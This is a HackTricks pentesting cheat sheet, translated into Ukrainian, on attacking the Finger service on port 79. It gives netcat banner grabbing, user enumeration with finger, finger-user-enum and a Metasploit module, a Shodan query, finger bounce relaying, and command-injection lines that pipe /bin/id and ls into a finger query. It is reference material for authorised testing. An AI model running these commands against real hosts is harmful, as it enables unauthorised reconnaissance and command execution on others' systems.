79 - Pentesting Finger

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Основна інформація

Програма/сервіс Finger використовується для отримання деталей про користувачів комп'ютера. Зазвичай надана інформація включає логін користувача, повне ім'я, а також у деяких випадках додаткові деталі. Ці додаткові деталі можуть включати місце розташування офісу та номер телефону (якщо доступно), час, коли користувач увійшов у систему, період неактивності (час простою), останній раз, коли користувач переглядав пошту, а також вміст файлів плану та проекту користувача.

Порт за замовчуванням: 79

PORT   STATE SERVICE
79/tcp open  finger

Перелік

Отримання банера/Основне з'єднання

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Перелік користувачів

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Альтернативно, ви можете використовувати finger-user-enum від pentestmonkey, деякі приклади:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap виконує скрипт для використання стандартних скриптів

Metasploit використовує більше трюків, ніж Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 КОРИСТУВАЧ

Виконання команд

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Використовуйте систему як реле для finger

finger user@host@victim
finger @internal@external
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Last updated